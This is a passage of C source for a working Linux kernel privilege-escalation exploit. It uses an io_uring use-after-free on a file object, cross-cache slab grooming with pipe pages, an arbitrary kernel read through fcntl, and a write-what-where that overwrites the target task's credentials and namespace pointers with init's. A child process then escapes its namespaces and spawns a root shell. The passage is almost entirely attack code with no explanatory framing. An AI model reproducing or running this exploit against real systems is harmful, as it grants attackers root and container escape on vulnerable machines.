close(g_pipe.fd[PIPE_READ]);
}
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
// Change our taskname
if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
while (1)
{
if (*(int *)g_shmem == 0x1337)
{
sleep(3);
info("Child dropping into root shell...");
if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
char *args[] = {"/bin/sh", NULL, NULL};
execve(args[0], args, NULL);
}
else { sleep(2); }
}
}
// Set-up environment for exploit
void setup_env(void)
{
// Make sure a page is a page and we're not on some bullshit machine
long page_sz = sysconf(_SC_PAGESIZE);
if (page_sz != 4096L)
{
err("Page size was: %ld", page_sz);
}
// Pin to CPU 0
pin_cpu(0);
info("Pinned process to core-0");
// Increase FD limit
increase_fds();
// Create shared mem
g_shmem = mmap(
(void *)0x1337000,
page_sz,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
-1,
0
);
if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
info("Shared memory @ 0x%lx", g_shmem);
// Create child
g_child = fork();
if (g_child == -1)
{
err("`fork()` failed");
}
// Child
if (g_child == 0)
{
child_exec();
}
info("Spawned child: %d", g_child);
// Change our name
if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
// Create io ring
struct io_uring_params params = { 0 };
if (io_uring_queue_init_params(8, &g_ring, &params))
{
err("`io_uring_queue_init_params()` failed");
}
info("Created io_uring");
// Create pipe
info("Creating pipe...");
create_pipe();
}
// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
if (io_uring_unregister_files(&g_ring))
{
err("`io_uring_unregister_files()` failed");
}
// Let the free actually happen
usleep(100000);
}
// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
// Calculate the amount of objects to spray
uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
g_cc1_num = spray_amt;
// Paranoid
if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc1_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
// Step 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
uint64_t spray_amt = OBJS_PER_SLAB - 1;
g_cc2_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc2_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
uint64_t spray_amt = OBJS_PER_SLAB + 1;
g_cc3_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc3_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim
// page in the partial list completely empty
void cc_4(void)
{
//info("Freeing `filp` objects from CC2 and CC3...");
for (size_t i = 0; i < g_cc2_num; i++)
{
close(g_cc2_fds[i]);
}
for (size_t i = 0; i < g_cc3_num; i++)
{
close(g_cc3_fds[i]);
}
usleep(100000);
return;
}
// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
//info("Freeing `filp` objects to overflow CPU partial list...");
for (size_t i = 0; i < g_cc1_num; i++)
{
if (i % OBJS_PER_SLAB == 0)
{
close(g_cc1_fds[i]);
}
}
usleep(100000);
return;
}
// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
// Close all the remaining FDs
info("Resetting cross-cache state...");
for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
{
close(g_cc1_fds[i]);
close(g_cc2_fds[i]);
close(g_cc3_fds[i]);
}
// Reset number trackers
g_cc1_num = 0;
g_cc2_num = 0;
g_cc3_num = 0;
}
// Do cross cache process
void do_cc(void)
{
// Start cross-cache process
cc_1();
cc_2();
// Allocate the victim filp
alloc_victim_filp();
// Free the victim filp
do_uaf();
// Resume cross-cache process
cc_3();
cc_4();
cc_5();
// Allow pages to be freed
usleep(100000);
}
void reset_pipe_buf(void)
{
char buf[4096] = { 0 };
read(g_pipe.fd[PIPE_READ], buf, 4096);
}
void zero_pipe_buf(void)
{
char buf[4096] = { 0 };
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}
// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL
// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 8 times to read 8 bytes
uint64_t val = 0;
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
*(uint64_t *)&buf[0x20] = target;
*(uint64_t *)&buf[0x120] = target;
*(uint64_t *)&buf[0x220] = target;
*(uint64_t *)&buf[0x320] = target;
*(uint64_t *)&buf[0x420] = target;
*(uint64_t *)&buf[0x520] = target;
*(uint64_t *)&buf[0x620] = target;
*(uint64_t *)&buf[0x720] = target;
*(uint64_t *)&buf[0x820] = target;
*(uint64_t *)&buf[0x920] = target;
*(uint64_t *)&buf[0xa20] = target;
*(uint64_t *)&buf[0xb20] = target;
*(uint64_t *)&buf[0xc20] = target;
*(uint64_t *)&buf[0xd20] = target;
*(uint64_t *)&buf[0xe20] = target;
*(uint64_t *)&buf[0xf20] = target;
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to val
val |= (arg << (i * 8));
}
return val;
}
void read_comm_at(unsigned long addr, char *comm)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 8 times to read the first 8 bytes of the comm
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
*(uint64_t *)&buf[0x20] = target;
*(uint64_t *)&buf[0x120] = target;
*(uint64_t *)&buf[0x220] = target;
*(uint64_t *)&buf[0x320] = target;
*(uint64_t *)&buf[0x420] = target;
*(uint64_t *)&buf[0x520] = target;
*(uint64_t *)&buf[0x620] = target;
*(uint64_t *)&buf[0x720] = target;
*(uint64_t *)&buf[0x820] = target;
*(uint64_t *)&buf[0x920] = target;
*(uint64_t *)&buf[0xa20] = target;
*(uint64_t *)&buf[0xb20] = target;
*(uint64_t *)&buf[0xc20] = target;
*(uint64_t *)&buf[0xd20] = target;
*(uint64_t *)&buf[0xe20] = target;
*(uint64_t *)&buf[0xf20] = target;
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to comm buf
comm[i] = arg;
}
}
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
// Copy our copied real ring fd
memcpy(&buf[g_off], g_ring_copy, 256);
// Set f->f_count to 1
uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
*count = 1;
// Set f->private_data to our scratch space
uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
*private_data = g_scratch;
// Set ctx->cqe_cached
size_t cqe_cached = g_scratch + 0x240;
cqe_cached &= 0xFFF;
uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
*cached_ptr = NULL_MEM;
// Set ctx->cqe_sentinel
size_t cqe_sentinel = g_scratch + 0x248;
cqe_sentinel &= 0xFFF;
uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];
// We need ctx->cqe_cached < ctx->cqe_sentinel
*sentinel_ptr = NULL_MEM + 1;
// Set ctx->rings so that ctx->rings->cq.tail is written to. That is at
// offset 0xc0 from cq base address
size_t rings = g_scratch + 0x10;
rings &= 0xFFF;
uint64_t *rings_ptr = (uint64_t *)&buf[rings];
*rings_ptr = where - 0xc0;
// Set ctx->cached_cq_tail which is our what
size_t cq_tail = g_scratch + 0x250;
cq_tail &= 0xFFF;
uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
*cq_tail_ptr = what;
// Set ctx->cq_wait the list head to itself (so that it's "empty")
size_t real_cq_wait = g_scratch + 0x268;
size_t cq_wait = (real_cq_wait & 0xFFF);
uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
*cq_wait_ptr = real_cq_wait;
}
void write_what_where(uint32_t what, uint64_t where)
{
// Reset the page contents
reset_pipe_buf();
// Setup the fake file target ctx
char buf[4096] = { 0 };
write_setup_ctx(buf, what, where);
// Set contents
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Get an sqe
struct io_uring_sqe *sqe = NULL;
sqe = io_uring_get_sqe(&g_ring);
if (!sqe)
{
err("`io_uring_get_sqe()` failed");
}
// Set values
sqe->opcode = IORING_OP_MSG_RING;
sqe->fd = g_uaf_fd;
int ret = io_uring_submit(&g_ring);
if (ret < 0)
{
err("`io_uring_submit()` failed");
}
// Wait for the completion
struct io_uring_cqe *cqe;
ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// So in this kernel code path, after we're done with our write-what-where, the
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_cred_where);
write_what_where(val_2 - 1, g_cred_where + 0x4);
}
void overwrite_real_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_real_cred_where);
write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}
void overwrite_nsproxy(void)
{
uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_nsproxy_where);
write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}
// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
else { return 0; }
}
void traverse_tasks(void)
{
// Process name buf
char current_comm[16] = { 0 };
// Get the next task after init
uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
uint64_t current = current_next - TASKS_NEXT_OFF;
if (!task_valid(current))
{
err("Invalid task after init: 0x%lx", current);
}
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// While we don't have NULL, traverse the list
while (task_valid(current))
{
current_next = read_8_at(current_next);
current = current_next - TASKS_NEXT_OFF;
if (current == g_init_task) { break; }
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// If we find the target comm, save it
if (!strcmp(current_comm, TARGET_TASK))
{
g_target_task = current;
}
// If we find our target comm, save it
if (!strcmp(current_comm, OUR_TASK))
{
g_our_task = current;
}
}
}
void find_pipe_buf_addr(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our fd in the array
files_ptr += (sizeof(uint64_t) * g_uaf_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Calculate the offset
g_off = curr_file & 0xFFF;
// Set the globals
g_file_addr = curr_file;
g_pipe_buf = g_file_addr - g_off;
return;
}
void make_ring_copy(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our ring fd in the array
files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Copy all the data into the buffer
for (size_t i = 0; i < 32; i++)
{
uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
*val_ptr = read_8_at(curr_file + (i * 8));
}
}
// Here, all we're doing is determining which side of the page the UAF file is
// on; if it's on the front half of the page, the back half is our scratch
// space, and vice versa
void set_scratch_space(void)
{
g_scratch = g_pipe_buf;
if (g_off < 0x500) { g_scratch += 0x500; }
}
// We failed the cross-cache stage, e.g. because we didn't replace the UAF object
void cc_fail(void)
{
cc_reset();
close(g_uaf_fd);
g_uaf_fd = -1;
release_pipe();
create_pipe();
sleep(1);
}
void write_pipe(unsigned char *buf)
{
if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
{
err("`write()` failed");
}
}
int main(int argc, char *argv[])
{
info("Setting up exploit environment...");
setup_env();
// Create a debug buffer
unsigned char buf[4096] = { 0 };
memset(buf, 'A', 4096);
retry_cc:
// Do cross-cache attempt
info("Attempting cross-cache...");
do_cc();
// Replace UAF file (and page) with pipe page
write_pipe(buf);
// Try to `lseek()` which should fail if we succeeded
if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
{
printf("[!] Cross-cache failed, retrying...\n");
cc_fail();
goto retry_cc;
}
// Success
info("Cross-cache succeeded");
sleep(1);
// Leak the `error_entry` pointer
uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
info("Leaked `error_entry` address: 0x%lx", error_entry);
// Make sure it seems kernel-ish
if ((uint16_t)(error_entry >> 48) != 0xFFFF)
{
err("Weird `error_entry` address: 0x%lx", error_entry);
}
// Set kernel base
g_kern_base = error_entry - EE_OFF;
info("Kernel base: 0x%lx", g_kern_base);
// Read 8 bytes at that address and see if they match our signature
uint64_t sig = read_8_at(g_kern_base);
if (sig != KERNEL_SIGNATURE)
{
err("Bad kernel signature: 0x%lx", sig);
}
// Set init_task
g_init_task = g_kern_base + INIT_OFF;
info("init_task @ 0x%lx", g_init_task);
// Get the cred and nsproxy values
g_cred_what = read_8_at(g_init_task + CRED_OFF);
g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);
if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
{
err("Weird init->cred value: 0x%lx", g_cred_what);
}
if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
{
err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
}
info("init cred address: 0x%lx", g_cred_what);
info("init nsproxy address: 0x%lx", g_nsproxy_what);
// Traverse the tasks list
info("Traversing tasks linked list...");
traverse_tasks();
// Check to see if we succeeded
if (!g_target_task) { err("Unable to find target task!"); }
if (!g_our_task) { err("Unable to find our task!"); }
// We found the target task
info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);
// Set where gadgets
g_cred_where = g_target_task + CRED_OFF;
g_real_cred_where = g_target_task + REAL_CRED_OFF;
g_nsproxy_where = g_target_task + NSPROXY_OFF;
info("Target cred @ 0x%lx", g_cred_where);
info("Target real_cred @ 0x%lx", g_real_cred_where);
info("Target nsproxy @ 0x%lx", g_nsproxy_where);
// Locate our file descriptor table
g_files = g_our_task + FILES_OFF;
g_fdt = read_8_at(g_files) + FDT_OFF;
g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;
info("Our files @ 0x%lx", g_files);
info("Our file descriptor table @ 0x%lx", g_fdt);
info("Our file array @ 0x%lx", g_file_array);
// Find our pipe address
find_pipe_buf_addr();
info("UAF file addr: 0x%lx", g_file_addr);
info("Pipe buffer addr: 0x%lx", g_pipe_buf);
// Set the global scratch space side of the page
set_scratch_space();
info("Scratch space base @ 0x%lx", g_scratch);
// Make a copy of our real io_uring file descriptor since we need to fake
// one
info("Making copy of legitimate io_uring fd...");
make_ring_copy();
info("Copy done");
// Overwrite our task's cred with init's
info("Overwriting our cred with init's...");
overwrite_cred();
// Make sure it's correct
uint64_t check_cred = read_8_at(g_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx",
check_cred, g_cred_what);
}
// Overwrite our real_cred with init's cred
sleep(1);
info("Overwriting our real_cred with init's...");
overwrite_real_cred();
// Make sure it's correct
check_cred = read_8_at(g_real_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
}
// Overwrite our nsproxy with init's
sleep(1);
info("Overwriting our nsproxy with init's...");
overwrite_nsproxy();
// Make sure it's correct
check_cred = read_8_at(g_nsproxy_where);
if (check_cred != g_nsproxy_what)
{
err("check_cred: 0x%lx != g_nsproxy_what: 0x%lx",
check_cred, g_nsproxy_what);
}
info("Creds and namespace look good!");
// Let the child loose
*(int *)g_shmem = 0x1337;
sleep(3000);
}